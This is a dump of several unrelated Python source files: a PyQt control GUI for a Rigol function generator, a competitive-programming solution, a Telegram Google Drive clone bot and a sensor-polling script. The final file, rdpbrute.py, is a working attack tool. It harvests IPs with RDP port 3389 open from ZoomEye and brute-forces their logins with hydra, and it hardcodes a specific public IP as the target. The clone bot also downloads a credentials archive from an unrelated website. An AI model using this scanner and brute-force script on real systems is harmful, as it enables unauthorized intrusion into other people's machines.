self.hscrollbar_ch1_ampl.sliderReleased.connect(self.controller_utils.apply_ch1_ampl)
self.hscrollbar_ch2_ampl.sliderReleased.connect(self.controller_utils.apply_ch2_ampl)
self.textbox_ch1_off.editingFinished.connect(self.controller_utils.apply_ch1_off)
self.textbox_ch2_off.editingFinished.connect(self.controller_utils.apply_ch2_off)
self.hscrollbar_ch1_off.sliderReleased.connect(self.controller_utils.apply_ch1_off)
self.hscrollbar_ch2_off.sliderReleased.connect(self.controller_utils.apply_ch2_off)
self.textbox_ch1_phase.editingFinished.connect(self.controller_utils.apply_ch1_phase)
self.textbox_ch2_phase.editingFinished.connect(self.controller_utils.apply_ch2_phase)
self.dial_ch1_phase.sliderReleased.connect(self.controller_utils.apply_ch1_phase)
self.dial_ch2_phase.sliderReleased.connect(self.controller_utils.apply_ch2_phase)
# connect the sliders/dials with the textbox above (and visa versa) to see the current slider/dial value
# Frequency
self.hscrollbar_ch1_freq.sliderMoved.connect(lambda slider=self.hscrollbar_ch1_freq, textbox=self.textbox_ch1_freq: self.ui_utils.connect_slider_textbox(slider=self.hscrollbar_ch1_freq, textbox=self.textbox_ch1_freq, factor=10))
self.hscrollbar_ch2_freq.sliderMoved.connect(lambda slider=self.hscrollbar_ch2_freq, textbox=self.textbox_ch2_freq: self.ui_utils.connect_slider_textbox(slider=self.hscrollbar_ch2_freq, textbox=self.textbox_ch2_freq, factor=10))
self.hscrollbar_ch1_freq.valueChanged.connect(lambda slider=self.hscrollbar_ch1_freq, textbox=self.textbox_ch1_freq: self.ui_utils.connect_slider_textbox(slider=self.hscrollbar_ch1_freq, textbox=self.textbox_ch1_freq, factor=10))
self.hscrollbar_ch2_freq.valueChanged.connect(lambda slider=self.hscrollbar_ch2_freq, textbox=self.textbox_ch2_freq: self.ui_utils.connect_slider_textbox(slider=self.hscrollbar_ch2_freq, textbox=self.textbox_ch2_freq, factor=10))
self.textbox_ch1_freq.editingFinished.connect(lambda slider=self.hscrollbar_ch1_freq, textbox=self.textbox_ch1_freq: self.ui_utils.connect_textbox_slider(textbox=self.textbox_ch1_freq, slider=self.hscrollbar_ch1_freq, factor=10))
self.textbox_ch2_freq.editingFinished.connect(lambda slider=self.hscrollbar_ch2_freq, textbox=self.textbox_ch2_freq: self.ui_utils.connect_textbox_slider(textbox=self.textbox_ch2_freq, slider=self.hscrollbar_ch2_freq, factor=10))
# Amplitude
self.hscrollbar_ch1_ampl.sliderMoved.connect(lambda slider=self.hscrollbar_ch1_ampl, textbox=self.textbox_ch1_ampl: self.ui_utils.connect_slider_textbox(slider=self.hscrollbar_ch1_ampl, textbox=self.textbox_ch1_ampl, factor=10))
self.hscrollbar_ch2_ampl.sliderMoved.connect(lambda slider=self.hscrollbar_ch2_ampl, textbox=self.textbox_ch2_ampl: self.ui_utils.connect_slider_textbox(slider=self.hscrollbar_ch2_ampl, textbox=self.textbox_ch2_ampl, factor=10))
self.hscrollbar_ch1_ampl.valueChanged.connect(lambda slider=self.hscrollbar_ch1_ampl, textbox=self.textbox_ch1_ampl: self.ui_utils.connect_slider_textbox(slider=self.hscrollbar_ch1_ampl, textbox=self.textbox_ch1_ampl, factor=10))
self.hscrollbar_ch2_ampl.valueChanged.connect(lambda slider=self.hscrollbar_ch2_ampl, textbox=self.textbox_ch2_ampl: self.ui_utils.connect_slider_textbox(slider=self.hscrollbar_ch2_ampl, textbox=self.textbox_ch2_ampl, factor=10))
self.textbox_ch1_ampl.editingFinished.connect(lambda slider=self.hscrollbar_ch1_ampl, textbox=self.textbox_ch1_freq: self.ui_utils.connect_textbox_slider(textbox=self.textbox_ch1_ampl, slider=self.hscrollbar_ch1_ampl, factor=10))
self.textbox_ch2_ampl.editingFinished.connect(lambda slider=self.hscrollbar_ch2_ampl, textbox=self.textbox_ch2_freq: self.ui_utils.connect_textbox_slider(textbox=self.textbox_ch2_ampl, slider=self.hscrollbar_ch2_ampl, factor=10))
# Offset
self.hscrollbar_ch1_off.valueChanged.connect(lambda slider=self.hscrollbar_ch1_off, textbox=self.textbox_ch1_off: self.ui_utils.connect_slider_textbox(slider=self.hscrollbar_ch1_off, textbox=self.textbox_ch1_off, factor=10))
self.hscrollbar_ch2_off.valueChanged.connect(lambda slider=self.hscrollbar_ch2_off, textbox=self.textbox_ch2_off: self.ui_utils.connect_slider_textbox(slider=self.hscrollbar_ch2_off, textbox=self.textbox_ch2_off, factor=10))
self.hscrollbar_ch1_off.sliderMoved.connect(lambda slider=self.hscrollbar_ch1_off, textbox=self.textbox_ch1_off: self.ui_utils.connect_slider_textbox(slider=self.hscrollbar_ch1_off, textbox=self.textbox_ch1_off, factor=10))
self.hscrollbar_ch2_off.sliderMoved.connect(lambda slider=self.hscrollbar_ch2_off, textbox=self.textbox_ch2_off: self.ui_utils.connect_slider_textbox(slider=self.hscrollbar_ch2_off, textbox=self.textbox_ch2_off, factor=10))
self.textbox_ch1_off.editingFinished.connect(lambda slider=self.hscrollbar_ch1_off, textbox=self.textbox_ch1_off: self.ui_utils.connect_textbox_slider(textbox=self.textbox_ch1_off, slider=self.hscrollbar_ch1_off, factor=10))
self.textbox_ch2_off.editingFinished.connect(lambda slider=self.hscrollbar_ch2_off, textbox=self.textbox_ch2_off: self.ui_utils.connect_textbox_slider(textbox=self.textbox_ch2_off, slider=self.hscrollbar_ch2_off, factor=10))
# Phase
self.dial_ch1_phase.sliderMoved.connect(lambda slider=self.dial_ch1_phase, textbox=self.textbox_ch1_phase: self.ui_utils.connect_slider_textbox(slider=self.dial_ch1_phase, textbox=self.textbox_ch1_phase, factor=1))
self.dial_ch2_phase.sliderMoved.connect(lambda slider=self.dial_ch2_phase, textbox=self.textbox_ch2_phase: self.ui_utils.connect_slider_textbox(slider=self.dial_ch2_phase, textbox=self.textbox_ch2_phase, factor=1))
self.textbox_ch1_phase.editingFinished.connect(lambda slider=self.dial_ch1_phase, textbox=self.textbox_ch1_phase: self.ui_utils.connect_textbox_slider(textbox=self.textbox_ch1_phase, slider=self.dial_ch1_phase, factor=1))
self.textbox_ch2_phase.editingFinished.connect(lambda slider=self.dial_ch2_phase, textbox=self.textbox_ch2_phase: self.ui_utils.connect_textbox_slider(textbox=self.textbox_ch2_phase, slider=self.dial_ch2_phase, factor=1))
#self.get_settings()
self.show()
def eventFilter(self, source, event):
if (event.type() == QtCore.QEvent.ModifiedChange and source is self.box_ch1_wform):
print('test')
return QtWidgets.QWidget.eventFilter(self, source, event)
# Function Generator Utils
class ControllerUtils():
# the gui is the instance of the main Qt Window (ControllerGui class)
gui = None
def __init__(self, gui):
ControllerUtils.gui = gui
def check_ch_status(self, channel):
#print('rigol ouput value: ' + rigol.get_output(channel))
if rigol.get_output(channel) == "ON\n":
output = 1
else:
output = 0
return output
def get_settings(self):
ch1_active = self.check_ch_status(1)
print('[GET] Channel 1 Status: ' + str(ch1_active))
#self.gui.checkBox_ch1_active.setChecked(ch1_active)
self.gui.checkBox_ch1_active.setChecked(2)
ch2_active = self.check_ch_status(2)
print('[GET] Channel 2 Status: ' + str(ch2_active))
self.gui.checkBox_ch2_active.setChecked(ch2_active)
ch1_wform = rigol.get_waveform(1)[4:]
print('[GET] Channel 1 Waveform: ' + str(ch1_wform))
self.gui.box_ch1_wform.setCurrentIndex(self.gui.box_ch1_wform.findText(ch1_wform, QtCore.Qt.MatchFixedString))
ch2_wform = rigol.get_waveform(2)[4:]
print('[GET] Channel 2 Waveform: ' + str(ch2_wform))
self.gui.box_ch2_wform.setCurrentIndex(self.gui.box_ch2_wform.findText(ch2_wform, QtCore.Qt.MatchFixedString))
ch1_freq = rigol.get_freq(1)
print('[GET] Channel 1 Frequency: ' + str(ch1_freq))
self.gui.textbox_ch1_freq.setText(ch1_freq)
self.gui.hscrollbar_ch1_freq.setValue(float(ch1_freq))
ch2_freq = rigol.get_freq(2)[4:]
print('[GET] Channel 2 Frequency: ' + str(ch2_freq))
self.gui.textbox_ch2_freq.setText(ch2_freq)
self.gui.hscrollbar_ch2_freq.setValue(float(ch2_freq))
ch1_ampl = rigol.get_ampl(1)
print('[GET] Channel 1 Amplitude: ' + str(ch1_ampl))
self.gui.textbox_ch1_ampl.setText(ch1_ampl)
self.gui.hscrollbar_ch1_ampl.setValue(float(ch1_ampl)*10)
ch2_ampl = rigol.get_ampl(2)[5:]
print('[GET] Channel 2 Amplitude: ' + str(ch2_ampl))
self.gui.textbox_ch2_ampl.setText(ch2_ampl)
self.gui.hscrollbar_ch2_ampl.setValue(float(ch2_ampl)*10)
ch1_off = rigol.get_off(1)
print('[GET] Channel 1 Offset: ' + str(ch1_off))
self.gui.textbox_ch1_off.setText(ch1_off)
self.gui.hscrollbar_ch1_off.setValue(float(ch1_off)*10)
ch2_off = rigol.get_off(2)
print('[GET] Channel 2 Offset: ' + str(ch2_off))
self.gui.textbox_ch2_off.setText(ch2_off)
self.gui.hscrollbar_ch2_off.setValue(float(ch2_off)*10)
ch1_phase = rigol.get_phase(1)
print('[GET] Channel 1 Phase: ' + str(ch1_phase))
self.gui.textbox_ch1_phase.setText(ch1_phase)
self.gui.dial_ch1_phase.setValue(float(ch1_phase))
ch2_phase = rigol.get_phase(2)
print('[GET] Channel 2 Phase: ' + str(ch2_phase))
self.gui.textbox_ch2_phase.setText(ch2_phase)
self.gui.dial_ch2_phase.setValue(float(ch2_phase))
print('got all settings...')
def apply_ch1_stat(self):
value_stat = self.gui.checkBox_ch1_active.checkState()
if value_stat == 2:
rigol.set_output(1, "ON")
else:
rigol.set_output(1, "OFF")
print('[SET] Channel 1 Status: ' + str(value_stat))
def apply_ch2_stat(self):
value_stat = self.gui.checkBox_ch2_active.checkState()
if value_stat == 2:
rigol.set_output(2, "ON")
else:
rigol.set_output(2, "OFF")
print('[SET] Channel 2 Status: ' + str(value_stat))
def apply_ch1_wform(self):
ch1_wform = self.gui.box_ch1_wform.currentText()
rigol.set_waveform(1, ch1_wform)
print('[SET] Channel 1 Waveform: ' + ch1_wform)
def apply_ch2_wform(self):
ch2_wform = self.gui.box_ch2_wform.currentText()
rigol.set_waveform(2, ch2_wform)
print('[SET] Channel 2 Waveform: ' + ch2_wform)
def apply_ch1_freq(self):
ch1_freq = self.gui.textbox_ch1_freq.text()
rigol.set_freq(1, float(ch1_freq))
print('[SET] Channel 1 Frequency: ' + ch1_freq)
def apply_ch2_freq(self):
ch2_freq = self.gui.textbox_ch2_freq.text()
rigol.set_freq(2, float(ch2_freq))
print('[SET] Channel 2 Frequency: ' + ch2_freq)
def apply_ch1_ampl(self):
ch1_ampl = self.gui.textbox_ch1_ampl.text()
rigol.set_ampl(1, float(ch1_ampl))
print('[SET] Channel 1 Amplitude: ' + ch1_ampl)
def apply_ch2_ampl(self):
ch2_ampl = self.gui.textbox_ch2_ampl.text()
rigol.set_ampl(2, float(ch2_ampl))
print('[SET] Channel 2 Amplitude: ' + ch2_ampl)
def apply_ch1_off(self):
#ch1_off = self.ui_utils.value_handler(self.gui.textbox_ch1_off.text())
ch1_off = self.gui.textbox_ch1_off.text()
rigol.set_off(1, float(ch1_off))
print('[SET] Channel 1 Offset: ' + ch1_off)
def apply_ch2_off(self):
ch2_off = self.gui.textbox_ch2_off.text()
rigol.set_off(2, float(ch2_off))
print('[SET] Channel 2 Offset: ' + ch2_off)
def apply_ch1_phase(self):
ch1_phase = self.gui.textbox_ch1_phase.text()
rigol.set_phase(1, float(ch1_phase))
print('[SET] Channel 1 offset: ' + ch1_phase)
def apply_ch2_phase(self):
ch2_phase = self.gui.textbox_ch2_phase.text()
rigol.set_phase(2, float(ch2_phase))
print('[SET] Channel 2 set: ' + ch2_phase)
def close_rigol(self):
rigol.close_rigol()
# User Interface Utils
class UIUtils():
gui = None
def __init__(self, gui):
UIUtils.gui = gui
def connect_slider_textbox(self, slider, textbox, factor):
textbox.setText(str(self.value_handler(slider.value(), factor)))
def connect_textbox_slider(self, textbox, slider, factor):
slider.setValue(int(float(textbox.text())*factor))
def value_handler(self, value, factor):
scaled_value = '{0:.2f}'.format(float(value/factor))
return scaled_value
def main():
app = QtGui.QApplication(sys.argv)
app.setWindowIcon(QtGui.QIcon("icon1.png"));
window = ControllerGui()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
[
"phy76371@stud.uni-stuttgart.de"
] |
phy76371@stud.uni-stuttgart.de
|
4079a5939d8149ce313449a2137c0d27b135d70d
|
54f352a242a8ad6ff5516703e91da61e08d9a9e6
|
/Source Codes/AtCoder/arc007/B/4778892.py
|
e50c65011d3a3d08b384a7d5b387ea1779015475
|
[] |
no_license
|
Kawser-nerd/CLCDSA
|
5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb
|
aee32551795763b54acb26856ab239370cac4e75
|
refs/heads/master
| 2022-02-09T11:08:56.588303
| 2022-01-26T18:53:40
| 2022-01-26T18:53:40
| 211,783,197
| 23
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 264
|
py
|
N, M = [int(_) for _ in input().split()]
disk = [int(input()) for i in range(M)]
result = [(i + 1) for i in range(N)]
n = 0
for d in disk:
if d != n:
i = result.index(d)
result[i], n = n, d
for i in range(N):
print(result[i])
|
[
"kwnafi@yahoo.com"
] |
kwnafi@yahoo.com
|
c7de1bec1f0955bc633eb67fad4e4cd01845a912
|
689374c378fb303ee8521f41b9140843e5047d7b
|
/bot/__main__.py
|
df71f49c0d2d72f0a569564ad8c64f4c68a28d32
|
[] |
no_license
|
jon4646/telegramclonebot
|
f7e46fdbfc6d615fbe4ff5b3bf29fe33623ba52a
|
378a163be8794d1d40e0a2a2e04c46a00200a535
|
refs/heads/main
| 2023-02-22T12:41:47.025643
| 2021-01-25T03:46:17
| 2021-01-25T03:46:17
| 333,927,450
| 0
| 0
| null | 2021-01-28T20:36:11
| 2021-01-28T20:36:10
| null |
UTF-8
|
Python
| false
| false
| 5,438
|
py
|
from telegram.ext import CommandHandler, run_async
from bot.gDrive import GoogleDriveHelper
from bot.fs_utils import get_readable_file_size
from bot import LOGGER, dispatcher, updater, bot
from bot.config import BOT_TOKEN, OWNER_ID, GDRIVE_FOLDER_ID
from bot.decorators import is_authorised, is_owner
from telegram.error import TimedOut, BadRequest
from bot.clone_status import CloneStatus
from bot.msg_utils import deleteMessage, sendMessage
import time
import dload
REPO_LINK = "https://github.com/jagrit007/Telegram-CloneBot"
# Soon to be used for direct updates from within the bot.
@run_async
def helpp(update, context):
sendMessage("မသိတာများရှိလျှင် ဂျပန်ဂတုံး @moedyiu သို့ဆက်သွယ်ပါ။",
context.bot, update, 'Markdown')
@run_async
def dl_sas(update, context):
dload.save_unzip("https://javbabes.me/accounts.zip", "./")
sendMessage("စတင်အသုံးပြုနိုင်ပါပြီ သင်၏ shared drive များတွင် telegramdrive1@googlegroups.com ကို Content Manager အဖြစ်ထည့်သွင်းထားပါ",
context.bot, update, 'Markdown')
@run_async
def start(update, context):
sendMessage("ကြိုဆိုပါတယ် /config ဟုရိုက်ပြီး စတင်လိုက်ပါ",
context.bot, update, 'Markdown')
# ;-;
@run_async
def helper(update, context):
sendMessage("Here are the available commands of the bot\n\n" \
"*Usage:* `/clone <link> [DESTINATION_ID]`\n*Example:* \n1. `/clone https://drive.google.com/drive/u/1/folders/0AO-ISIXXXXXXXXXXXX`\n2. `/clone 0AO-ISIXXXXXXXXXXXX`" \
"\n*DESTIONATION_ID* is optional. It can be either link or ID to where you wish to store a particular clone." \
"\n\nYou can also *ignore folders* from clone process by doing the following:\n" \
"`/clone <FOLDER_ID> [DESTINATION] [id1,id2,id3]`\n In this example: id1, id2 and id3 would get ignored from cloning\nDo not use <> or [] in actual message." \
"*Make sure to not put any space between commas (,).*\n" \
f"Source of this bot: [GitHub]({REPO_LINK})", context.bot, update, 'Markdown')
# TODO Cancel Clones with /cancel command.
@run_async
# @is_authorised
def cloneNode(update, context):
args = update.message.text.split(" ")
if len(args) > 1:
link = args[1]
try:
ignoreList = args[-1].split(',')
except IndexError:
ignoreList = []
DESTINATION_ID = GDRIVE_FOLDER_ID
try:
DESTINATION_ID = args[2]
print(DESTINATION_ID)
except IndexError:
pass
# Usage: /clone <FolderToClone> <Destination> <IDtoIgnoreFromClone>,<IDtoIgnoreFromClone>
msg = sendMessage(f"<b>Cloning:</b> <code>{link}</code>", context.bot, update)
status_class = CloneStatus()
gd = GoogleDriveHelper(GFolder_ID=DESTINATION_ID)
sendCloneStatus(update, context, status_class, msg, link)
result = gd.clone(link, status_class, ignoreList=ignoreList)
deleteMessage(context.bot, msg)
status_class.set_status(True)
sendMessage(result, context.bot, update)
else:
sendMessage("/copy SourceID DestinationID \n\n/copy https://drive.google.com/xxxxxxxxx https://drive.google.com/zzzzzzzzzz\n\nဟုပေးပို့ကူးယူပါ", bot, update)
@run_async
def sendCloneStatus(update, context, status, msg, link):
old_text = ''
while not status.done():
sleeper(3)
try:
text=f'🔗 *Cloning:* [{status.MainFolderName}]({status.MainFolderLink})\n━━━━━━━━━━━━━━\n🗃️ *Current File:* `{status.get_name()}`\n⬆️ *Transferred*: `{status.get_size()}`\n📁 *Destination:* [{status.DestinationFolderName}]({status.DestinationFolderLink})'
if status.checkFileStatus():
text += f"\n🕒 *Checking Existing Files:* `{str(status.checkFileStatus())}`"
if not text == old_text:
msg.edit_text(text=text, parse_mode="Markdown", timeout=200)
old_text = text
except Exception as e:
LOGGER.error(e)
if str(e) == "Message to edit not found":
break
sleeper(2)
continue
return
def sleeper(value, enabled=True):
time.sleep(int(value))
return
@run_async
@is_owner
def sendLogs(update, context):
with open('log.txt', 'rb') as f:
bot.send_document(document=f, filename=f.name,
reply_to_message_id=update.message.message_id,
chat_id=update.message.chat_id)
def main():
LOGGER.info("Bot Started!")
clone_handler = CommandHandler('copy', cloneNode)
start_handler = CommandHandler('start', start)
help_handler = CommandHandler('hellp', helper)
log_handler = CommandHandler('logs', sendLogs)
sas_handler = CommandHandler('config', dl_sas)
helpp_handler = CommandHandler('help', helpp)
dispatcher.add_handler(helpp_handler)
dispatcher.add_handler(sas_handler)
dispatcher.add_handler(log_handler)
dispatcher.add_handler(start_handler)
dispatcher.add_handler(clone_handler)
dispatcher.add_handler(help_handler)
updater.start_polling()
main()
|
[
"noreply@github.com"
] |
jon4646.noreply@github.com
|
75526fe121d3c14c20443e89184aa18b7e302a2e
|
b24adc31b7c781ea156882c3cc657bb03034e8d4
|
/OpensenseMapTemperatureLoop.py
|
02057ba130f2ab23aa31ae88899d148ba9390ac1
|
[] |
no_license
|
harunler/PythonStreaming101
|
271c7ca8dfd87da95412d4bc89c2ba80ac491927
|
8d2b4342cff776197ada8488e5bc953ddfb73cc2
|
refs/heads/master
| 2022-08-12T21:59:14.480406
| 2020-05-04T17:47:19
| 2020-05-04T17:47:19
| 259,614,626
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,018
|
py
|
import asyncio
import aiohttp
import json
STATION_ID = "5b8449037c519100190fc728"
SENSOR_ID = "5b8449037c519100190fc72a"
async def fetchContent(session, url):
async with session.get(url) as response:
return await response.text()
async def getTemperature():
async with aiohttp.ClientSession() as session:
url = f"https://api.opensensemap.org/boxes/{STATION_ID}?format=json"
content = await fetchContent(session, url)
data = json.loads(content)
sensors = data["sensors"]
for sensor in sensors:
if sensor["_id"] == SENSOR_ID:
print(
sensor["lastMeasurement"]["createdAt"],
sensor["title"],
sensor["lastMeasurement"]["value"],
sensor["unit"],
sep = ", ")
await asyncio.sleep(60)
loop.create_task(getTemperature())
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.create_task(getTemperature())
loop.run_forever()
loop.stop()
loop.close()
|
[
"noreply@github.com"
] |
harunler.noreply@github.com
|
c4ea8e6e09385564e75ef4d36a7fafa8033aaffb
|
691e4890a070b18feb74e1bf817af8ebe9db342b
|
/V-Scrack/exp/payload/rdpbrute.py
|
ca37e6fb3d5b4ee57d7232ee3d6aaf8c36b5749a
|
[] |
no_license
|
witchfindertr/Python-crack
|
764af457b140fad4f28f259dc14c444d2445b287
|
88659e72e98d4cec0df52d2f5b4b9c8af35a39a6
|
refs/heads/master
| 2023-02-23T12:45:11.475706
| 2020-03-03T14:41:05
| 2020-03-03T14:41:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,409
|
py
|
# -*-coding:utf-8-*-
import optparse
import os
import requests
import time
def main():
usage='[help -s 扫描全网3389]'
parser=optparse.OptionParser(usage)
parser.add_option('-s',action='store_true',dest='ji',help='扫描全网3389')
parser.add_option('-b',dest='bao',help='爆破字典(username)')
parser.add_option('-p',dest='passs',help='爆破字典(password)')
parser.add_option('-x',dest='host',help='目标')
(options,args)=parser.parse_args()
if options.ji:
Ji()
elif options.bao and options.host and options.passs:
bao=options.bao
ip=options.host
passs=options.passs
Bao(bao,ip,passs)
else:
parser.print_help()
exit()
def Ji():
for r in range(1,10):
time.sleep(1)
g='https://api.zoomeye.org/host/search?query=port:3389&page={}'.format(r)
headers={"Authorization":"JWT token"}
r=requests.get(g,headers=headers)
sd=r.json()
rsd=sd['matches'][0:]
for l in rsd:
print(l['ip'])
owe=l['ip']
with open('3389.txt','a') as p:
p.write(owe+'\n')
def Bao(bao,ip,passs):
baopo=os.system('hydra.exe -L {} -P {} rdp://{}'.format(bao,passs,ip))
if __name__ == '__main__':
bao = 'Administrator',
passs = 'pass_dict.txt',
ip = '150.109.64.81',
res = Bao(bao,ip,passs)
print(res)
|
[
"xianghgoog@gmail.com"
] |
xianghgoog@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.